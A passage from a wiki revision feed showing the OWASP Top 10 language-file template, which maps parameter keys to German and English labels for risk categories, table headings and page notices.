        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      ERROR in the 'Language File' (Use of the unused Object)&lt;br /&gt;
        | #default =                      ERROR in the 'Language File' (Use of an unknown Object)&lt;br /&gt;
     }} &amp;lt;!-- End of English --&amp;gt;&lt;br /&gt;
}}&amp;lt;/onlyinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232187</id>
		<title>Template:Top 10:LanguageFile</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Template:Top_10:LanguageFile&amp;diff=232187"/>
				<updated>2017-08-11T19:09:19Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Changed RC1 warning text&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;!----------------------------------------------------------------------------&amp;gt; &lt;br /&gt;
&amp;lt;!-- This File contains all the text that is used by OWASP Top 10 Templates --&amp;gt;&lt;br /&gt;
&amp;lt;!--             Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;!----------------------------------------------------------------------------&amp;gt;&lt;br /&gt;
==='''Usage:''' ===&lt;br /&gt;
This File contains all the text that is used by OWASP Top 10 Templates&amp;lt;br/&amp;gt;&lt;br /&gt;
Please leave a message to {{Template:Contact | name = Torsten Gigler | email =torsten.gigler@owasp.org | username = T.Gigler}} &lt;br /&gt;
if you liked to add a new localization&amp;lt;br&amp;gt;                     &lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
If you use an undefined language you will get English output (default language).&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |text=&amp;lt;parameter&amp;gt; &amp;lt;!-- take one of the defined parmeters, e.g. tableOfContents --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |language=&amp;lt;your language&amp;gt;   &amp;lt;!-- actually only English (=en) and German (=de) are valid parameters) --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
:&amp;lt;nowiki&amp;gt;  |year=&amp;lt;year&amp;gt;   &amp;lt;!-- optional for some texts --&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;}}&amp;lt;/nowiki&amp;gt;&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
====Example:====&lt;br /&gt;
&amp;lt;nowiki&amp;gt;{{Top_10:LanguageFile|text=tableOfContents|language=de}} =&amp;gt;&amp;lt;/nowiki&amp;gt; {{Top_10:LanguageFile|text=tableOfContents|language=de}}&lt;br /&gt;
----&lt;br /&gt;
==='''Healthcheck'''===&lt;br /&gt;
tbd.&amp;lt;br/&amp;gt;&lt;br /&gt;
In the meantime, please check:&lt;br /&gt;
* [[Top_10_2013-Table_of_Contents | English Top 10 Wiki]]&lt;br /&gt;
* [[Germany/Projekte/Top_10-2013-Inhaltsverzeichnis | German Top 10 Wiki]]&lt;br /&gt;
----&lt;br /&gt;
If you use an unknown parameter you will get the following Error message in your wiki page:&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!---       Please add a new language solely here!!!                   --&amp;gt;&lt;br /&gt;
&amp;lt;onlyinclude&amp;gt;{{#switch: {{{language}}}&lt;br /&gt;
   | de = &amp;lt;!-- German --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Germany/Projekte/Top 10-{{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Germany/Projekte/Top 10 fuer Entwickler-{{{year}}}&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage =               ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10-2013==&lt;br /&gt;
        | top10TmpMessageDeveloperEdition = ==BAUSTELLE! Hier entsteht das deutsche Wiki der OWASP Top 10 fuer Entwickler-2013==&lt;br /&gt;
        | centerLink1 =                   [[Germany/Projekte/Top 10-2013-Inhaltsverzeichnis|2013 Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2 =                   [[Germany/Projekte/Top 10-2013-Top 10|2013 Die Top-10-Risiken]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Inhaltsverzeichnis|Top 10 fuer Entwickler-2013: Inhaltsverzeichnis]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Germany/Projekte/Top 10 fuer Entwickler-2013/Top 10|Die Top-10-Risiken]]&lt;br /&gt;
        | projectCategory =               [[Category: Germany/Projekte/Top 10-2013]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top 10 fuer Entwickler]] [[Category: Germany/Projekte/Top 10 fuer Entwickler-2013]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for Top 10 2013-CenterLinkTemplate --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Inhaltsverzeichnis&lt;br /&gt;
        | foreword =                      Vorwort&lt;br /&gt;
        | forewordTranslation =           Vorwort der deutschen Übersetzung&lt;br /&gt;
        | forward =                       Vorwort &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Vorwort der deutschen Übersetzung &amp;lt;!--- behobener Fehler im englischen Original ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    Über OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright und Lizenz&lt;br /&gt;
        | introduction =                  Einleitung&lt;br /&gt;
        | releaseNotes =                  Neuerungen&lt;br /&gt;
        | risks =                         Risiken&lt;br /&gt;
        | risk =                          Risiko&lt;br /&gt;
        | subTitleApplicationRisks =      (Sicherheitsrisiken für Anwendungen)&lt;br /&gt;
        | riskLarge =                     RISIKO&lt;br /&gt;
        | applicationSecurityRisks =      Was sind Sicherheitsrisiken für Anwendungen? &lt;br /&gt;
        | theTop10 =                      Die Top-10-Risiken&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        Nächste Schritte für Software-Entwickler&lt;br /&gt;
        | whatsNextforVerifiers =         Nächste Schritte für Prüfer&lt;br /&gt;
        | whatsNextforOrganizations =     Nächste Schritte für Organisationen&lt;br /&gt;
        | noteAboutRisks =                Anmerkungen zum Risikobegriff&lt;br /&gt;
        | detailsAboutRiskFactors =       Details zu Risiko-Faktoren&lt;br /&gt;
        | appendix =                      Anlage&lt;br /&gt;
        | warnings =                      Zur Beachtung&lt;br /&gt;
        | acknowledgements =              Danksagung&lt;br /&gt;
        | attribution =                   Namensnennung/Danksagung&lt;br /&gt;
        | whatChangedFrom2010to2013 =     Was hat sich von Version 2010 zu 2013 verändert?&lt;br /&gt;
        | welcome =                       Herzlich Willkommen&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          Was sind Sicherheitsrisiken für Anwendungen?&lt;br /&gt;
        | whatsMyRisk =                   Was sind &amp;lt;u&amp;gt;meine&amp;lt;/u&amp;gt; Risiken?&lt;br /&gt;
        | references =                    Referenzen&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Etablierung und Nutzung umfassender Sicherheitsmaßnahmen&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Starten Sie jetzt mit Ihrem Anwendungssicherheits-Programm!&lt;br /&gt;
        | getOrganized =                  Organisation und Prozesse &lt;br /&gt;
        | codeReview =                    Code-Analyse&lt;br /&gt;
        | securityAndPenetrationTesting = Sicherheits- und Penetrationstests&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    Es geht nicht um Schwachstellen, sondern um Risiken&lt;br /&gt;
        | top10RiskFactorSummary =        Zusammenfassung der Top 10 Risiko-Faktoren&lt;br /&gt;
        | additionalRisksToConsider =     Weitere zu betrachtende Risiken &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Fehler in Authentifizierung und Session-Management&lt;br /&gt;
        | authentication =                Authentifizierung &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Unsichere direkte Objektreferenzen&lt;br /&gt;
        | insecureDOR =                   Unsichere direkte Objektreferenzen&lt;br /&gt;
        | securityMisconfig =             Sicherheitsrelevante Fehlkonfiguration&lt;br /&gt;
        | misconfig =                     Fehlkonfiguration&lt;br /&gt;
        | sensitiveDataExposure =         Verlust der Vertraulichkeit sensibler Daten&amp;lt;noinclude&amp;gt;ex: Sensitive Data Exposure&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | sensData =                      Sens. Data&amp;lt;noinclude&amp;gt;(tbd)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | missingFunctionLevelACL =       Fehlerhafte Autorisierung auf Anwendungsebene &amp;lt;noinclude&amp;gt;(tbd = Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | functionAcc =                   Fehlerh. Autorisierung&amp;lt;noinclude&amp;gt;(tbd = Kurzform für Missing Function Level Access Control)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Benutzen von Komponenten mit bekannten Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = Using Components with Known Vulnerabilities)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnComponents =                Komponenten mit Schwachstellen &amp;lt;noinclude&amp;gt;(tbd = vuln. Components)&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Ungeprüfte Um- und Weiterleitungen&lt;br /&gt;
        | unvalRedirects =                Ungepr. Weiterltg.&lt;br /&gt;
        | insecureCryptographicStorage =  Kryptografisch unsichere Speicherung&lt;br /&gt;
        | failureRestrictUrlAccess =      Mangelhafter URL-Zugriffsschutz&lt;br /&gt;
        | insufficientTLProtection =      Unzureichende Absicherung der Transportschicht&lt;br /&gt;
        | inProgress =                    In Arbeit &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Anwendungs-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | appSpecific =                   Anw.-&amp;lt;br&amp;gt;spezifisch&lt;br /&gt;
        | applicationBusinessSpecific =   Anwendungs-/&amp;lt;br&amp;gt;Geschäftsspezifisch&lt;br /&gt;
        | appBusinessSpecific =           Anw.-/&amp;lt;br&amp;gt;Geschäftsspez. &lt;br /&gt;
        | exploitability =                Ausnutzbarkeit&lt;br /&gt;
        | easy =                          EINFACH&lt;br /&gt;
        | average =                       DURCHSCHNITTLICH&lt;br /&gt;
        | difficult =                     SCHWIERIG&lt;br /&gt;
        | weakness =                      &amp;lt;!-- not used ---&amp;gt; &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt;&lt;br /&gt;
        | prevalence =                    Verbreitung&lt;br /&gt;
        | veryWidespread =                AUSSERGEWÖHNLICH HÄUFIG&lt;br /&gt;
        | widespread =                    SEHR HÄUFIG&lt;br /&gt;
        | common =                        HÄUFIG&lt;br /&gt;
        | uncommon =                      SELTEN&lt;br /&gt;
        | detectability =                 Auffindbarkeit&lt;br /&gt;
        | impact =                        Auswirkung&lt;br /&gt;
        | severe =                        SCHWERWIEGEND&lt;br /&gt;
        | moderate =                      MITTEL&lt;br /&gt;
        | minor =                         GERING  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Bedrohungsquelle&lt;br /&gt;
        | attackVectors =                 Angriffsvektor&lt;br /&gt;
        | securityWeakness =              Schwachstellen&lt;br /&gt;
        | technicalImpacts =              Technische Auswirkung&lt;br /&gt;
        | businessImpacts =               Auswirkung auf das Unternehmen&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 de threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 de attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 de securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 de technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 de businessImpacts.png  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top 10 de ApplicationSecurityRisks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt;          &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Bin ich durch {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verwundbar?&lt;br /&gt;
        | vulnerableTo1 =                 Bin ich durch&lt;br /&gt;
        | vulnerableTo2 =                 &amp;amp;nbsp;verwundbar?&lt;br /&gt;
        | howPrevent =                    Wie kann ich {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }} verhindern?&lt;br /&gt;
        | howPrevent1 =                   Wie kann ich &lt;br /&gt;
        | howPrevent2 =                   &amp;amp;nbsp;verhindern?&lt;br /&gt;
        | exampleScenarios =              Mögliche Angriffsszenarien &lt;br /&gt;
        | defendingOption =               Verteidigungs-Option&lt;br /&gt;
        | against =                       gegen&lt;br /&gt;
        | userImpact =                    Auswirkung(en) auf den Benutzer &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;   &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;         &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      Andere                    &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt;   &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | myUnused =                      FEHLER im 'Language File' (Aufruf des unbenutzten Objekts)&lt;br /&gt;
        | #default =                      FEHLER im 'Language File' (Aufruf des unbekannten Objekts)&lt;br /&gt;
     }} &amp;lt;!-- End of German --&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;&lt;br /&gt;
&amp;lt;!-- English = default; so here is nothing to do --&amp;gt; &lt;br /&gt;
&amp;lt;!-- | en =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | us =  --&amp;gt;&lt;br /&gt;
&amp;lt;!-- | gb =  --&amp;gt;&lt;br /&gt;
&amp;lt;/noinclude&amp;gt; | #default = &amp;lt;!-- English --&amp;gt;&lt;br /&gt;
     {{#switch: {{{text}}} &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN Document-Root --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | documentRootTop10 =                 Top 10 {{{year}}}&lt;br /&gt;
        | documentRootTop10DeveloperEdition = Top 10 {{{year}}} Developer Edition&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END Document-Root --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for Top 10 2013-CenterLinkTemplate + Top 10 2013:Top and Bottom(Advanced)Template(s) --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | top10TmpMessage = &lt;br /&gt;
           {{#switch: {{{year}}} &lt;br /&gt;
             | 2017 =               ==This page is outdated. It is part of the Top 10-2017 RC1 Wiki which has been rejected. &amp;lt;br/&amp;gt;==If you wish to comment, please file an [https://github.com/OWASP/Top10/issues issue on GitHub]. Changes to this page will be lost!==&amp;lt;br/&amp;gt;==More information available [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2017_Release_Candidate_1 here]].&lt;br /&gt;
             | 2013 =               &amp;lt;noinclude&amp;gt;==The Top 10-2013 Wiki is under Construction. The Content is Not Finished yet==&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
           }}&lt;br /&gt;
        | top10TmpMessageDeveloperEdition =   ==The Top 10-2013 Developer Edition Wiki is under Connstruction. The Content is Not Finished yet==&lt;br /&gt;
        | centerLink1 =                   [[Top 10 {{{year}}}-Table of Contents | {{{year}}} Table of Contents]]&lt;br /&gt;
        | centerLink2 =                   [[Top_10_{{{year}}}-Top 10|{{{year}}} Top 10 List]]&lt;br /&gt;
        | centerLink1DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Table of Contents|{{{year}}} Developer Edition-Table of Contents]]&lt;br /&gt;
        | centerLink2DeveloperEdition =   [[Top 10 {{{year}}} Developer Edition-Top 10 List|{{{year}}} Developer Edition-Top 10 List]]&lt;br /&gt;
        | projectCategory =               [[Category:OWASP Top Ten Project]] [[Category:OWASP Top Ten {{{year}}} Project]]&lt;br /&gt;
        | projectCategoryDeveloperEdition = [[Category:OWASP Top Ten {{{year}}} Developer Edition]]&amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN main Document --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | tableOfContents =               Table of Contents&lt;br /&gt;
        | foreword =                      Foreword&lt;br /&gt;
        | forewordTranslation =           Foreword of the English Wiki&lt;br /&gt;
        | forward =                       Forward &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | forwardTranslation =            Forward of the English Wiki &amp;lt;!--- looks like a repaired issue ---&amp;gt;&lt;br /&gt;
        | aboutOWASP =                    About OWASP&lt;br /&gt;
        | copyrightAndLicense             Copyright and License&lt;br /&gt;
        | introduction =                  Introduction&lt;br /&gt;
        | releaseNotes =                  Release Notes&lt;br /&gt;
        | risks =                         Risks&lt;br /&gt;
        | risk =                          Risk&lt;br /&gt;
        | subTitleApplicationRisks =      (Application Security Risks)&lt;br /&gt;
        | riskLarge =                     RISIK&lt;br /&gt;
        | applicationSecurityRisks =      Application Security Risks&lt;br /&gt;
        | theTop10 =                      The Top 10&lt;br /&gt;
        | top10 =                         Top 10&lt;br /&gt;
        | whatsNextforDevelopers =        What's Next for Developers&lt;br /&gt;
        | whatsNextforVerifiers =         What's Next for Verifiers&lt;br /&gt;
        | whatsNextforSecurityTesting =   What's Next for Security Testing&lt;br /&gt;
        | whatsNextforOrganizations =     What's Next for Organizations&lt;br /&gt;
        | noteAboutRisks =                Note About Risks&lt;br /&gt;
        | OWASPTop10ApplicationSecurityRisks = OWASP Top 10 Application Security Risks&lt;br /&gt;
        | detailsAboutRiskFactors =       Details About Risk Factors&lt;br /&gt;
        | appendix =                      appendix&lt;br /&gt;
        | warnings =                      Warnings&lt;br /&gt;
        | acknowledgements =              Acknowledgements&lt;br /&gt;
        | attribution =                   Attribution&lt;br /&gt;
        | whatChangedFrom2010to2013 =     What Changed From 2010 to 2013?&lt;br /&gt;
        | welcome =                       Welcome&lt;br /&gt;
        | whatAreApplicationSecurityRisks =          What Are Application Security Risks?&lt;br /&gt;
        | whatsMyRisk =                   What's My Risk?&lt;br /&gt;
        | references =                    References&lt;br /&gt;
        | establishAndUseAFullSetOfCommonSecurityControls = Establish &amp;amp; Use Repeatable Security Processes and Standard Security Controls&lt;br /&gt;
        | startYourApplicationSecurityProgramNow =   Start Your Application Security Program Now&lt;br /&gt;
        | establishContinuousApplicationSecurityTesting = Establish Continuous Application Security Testing&lt;br /&gt;
        | getOrganized =                  Get Organized&lt;br /&gt;
        | codeReview =                    Code Review&lt;br /&gt;
        | securityAndPenetrationTesting = Security and Penetration Testing&lt;br /&gt;
        | itsAboutRisksNotWeaknesses =    It's About Risks, Not Weaknesses&lt;br /&gt;
        | top10RiskFactorSummary =        Top 10 Risk Factor Summary&lt;br /&gt;
        | additionalRisksToConsider =     Additional Risks to Consider  &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END main Document --&amp;gt; &lt;br /&gt;
        &amp;lt;!-- BEGIN of Top Ten Section for ByTheNumbersTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | injection =                     Injection&lt;br /&gt;
        | brokenAuthSessionMgmt =         Broken Authentication and Session Management&lt;br /&gt;
        | authentication =                Authentication &amp;lt;!-- short form for 'Broken Authentication and Session Management' ---&amp;gt;&lt;br /&gt;
        | xss =                           Cross-Site Scripting (XSS)&lt;br /&gt;
        | xssShort =                      XSS&lt;br /&gt;
        | insecureDirectObjectReference = Insecure Direct Object References&lt;br /&gt;
        | insecureDOR =                   Insecure DOR&lt;br /&gt;
        | securityMisconfig =             Security Misconfiguration&lt;br /&gt;
        | misconfig =                     Misconfig&lt;br /&gt;
        | sensitiveDataExposure =         Sensitive Data Exposure&lt;br /&gt;
        | sensData =                      Sens. Data&lt;br /&gt;
        | missingFunctionLevelACL =       Missing Function Level Access Control&lt;br /&gt;
        | functionAcc =                   Function Acc.&lt;br /&gt;
        | csrf =                          Cross-Site Request Forgery (CSRF)&lt;br /&gt;
        | csrfShort =                     CSRF&lt;br /&gt;
        | usingVulnerableComponents =     Using Components with Known Vulnerabilities&lt;br /&gt;
        | vulnComponents =                vuln. Components&lt;br /&gt;
        | unvalidatedRedirectsForwards =  Unvalidated Redirects and Forwards&lt;br /&gt;
        | unvalRedirects =                unval. Redirects&lt;br /&gt;
        | insecureCryptographicStorage =  Insecure Cryptographic Storage&lt;br /&gt;
        | failureRestrictUrlAccess =      Failure to Restrict URL Access&lt;br /&gt;
        | insufficientTLProtection =      Insufficient Transport Layer Protection&lt;br /&gt;
        | brokenAccessControl =           Broken Access Control &lt;br /&gt;
        | insufficientAttackPrevention =  Insufficient Attack Protection &lt;br /&gt;
        | underprotectedAPIs =            Underprotected APIs&lt;br /&gt;
        | accessCtrl =                    Access Ctrl&lt;br /&gt;
        | attackProt  =                   Attack Prot.&lt;br /&gt;
        | ApiProt =                       API Prot.&lt;br /&gt;
        | inProgress =                    In Progress &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Top Ten Section for ByTheNumbersTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for Top 10:SummaryTableTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSpecific =           Application Specific&lt;br /&gt;
        | appSpecific =                   App Specific&lt;br /&gt;
        | applicationBusinessSpecific =   Application / Business Specific  &lt;br /&gt;
        | appBusinessSpecific =           App / Business Specific       &lt;br /&gt;
        | exploitability =                Exploitability&lt;br /&gt;
        | easy =                          EASY&lt;br /&gt;
        | average =                       AVERAGE&lt;br /&gt;
        | difficult =                     DIFFICULT&lt;br /&gt;
        | weakness =                      Weakness &amp;lt;!-- for table in Top_10_2013-Risk --&amp;gt; &lt;br /&gt;
        | prevalence =                    Prevalence&lt;br /&gt;
        | veryWidespread =                VERY WIDESPREAD&lt;br /&gt;
        | widespread =                    WIDESPREAD&lt;br /&gt;
        | common =                        COMMON&lt;br /&gt;
        | uncommon =                      UNCOMMON&lt;br /&gt;
        | detectability =                 Detectability&lt;br /&gt;
        | impact =                        Impact&lt;br /&gt;
        | severe =                        SEVERE&lt;br /&gt;
        | moderate =                      MODERATE&lt;br /&gt;
        | minor =                         MINOR &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for Top 10:SummaryTableTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SummaryTableHeaderBeginTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | threatAgents =                  Threat Agents&lt;br /&gt;
        | attackVectors =                 Attack Vectors&lt;br /&gt;
        | securityWeakness =              Security Weakness&lt;br /&gt;
        | technicalImpacts =              Technical Impacts&lt;br /&gt;
        | businessImpacts =               Business Impacts&lt;br /&gt;
        | threatAgentsImage =             Image:Top 10 threatAgents.png&lt;br /&gt;
        | attackVectorsImage =            Image:Top 10 attackVectors.png&lt;br /&gt;
        | securityWeaknessImage=          Image:Top 10 securityWeakness.png&lt;br /&gt;
        | technicalImpactsImage =         Image:Top 10 technicalImpacts.png &lt;br /&gt;
        | businessImpactsImage =          Image:Top 10 businessImpacts.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for SummaryTableHeaderBeginTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for other Images --&amp;gt;        &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | applicationSecurityRisksImage = Image:Top_10_2013-appsec-risks.png &amp;lt;noinclude&amp;gt;&lt;br /&gt;
        &amp;lt;!-- END of Section for other Images --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of Section for SubsectionAdvancedTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | vulnerableTo =                  Am I Vulnerable To {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | vulnerableTo1 =                 Am I Vulnerable To&lt;br /&gt;
        | vulnerableTo2 =                 ?&lt;br /&gt;
        | howPrevent =                    How Do I Prevent {{Top_10_2010:ByTheNumbers|{{{risk}}}|year={{{year}}}|language={{{language}}} }}?&lt;br /&gt;
        | howPrevent1 =                   How Do I Prevent&lt;br /&gt;
        | howPrevent2 =                   ?&lt;br /&gt;
        | exampleScenarios =              Example Attack Scenarios &lt;br /&gt;
        | defendingOption =               Defending Option&lt;br /&gt;
        | against =                       against&lt;br /&gt;
        | userImpact =                    Impact to the User &amp;lt;noinclude&amp;gt;&amp;lt;!-- not used, yet --&amp;gt;  &lt;br /&gt;
        &amp;lt;!-- END of Section for SubsectionAdvancedTemplate --&amp;gt;&lt;br /&gt;
        &amp;lt;!-- BEGIN of SubSubsectionExternalReferencesTemplate --&amp;gt; &amp;lt;/noinclude&amp;gt;&lt;br /&gt;
        | external =                      External &amp;lt;noinclude&amp;gt;&lt;br /&gt;
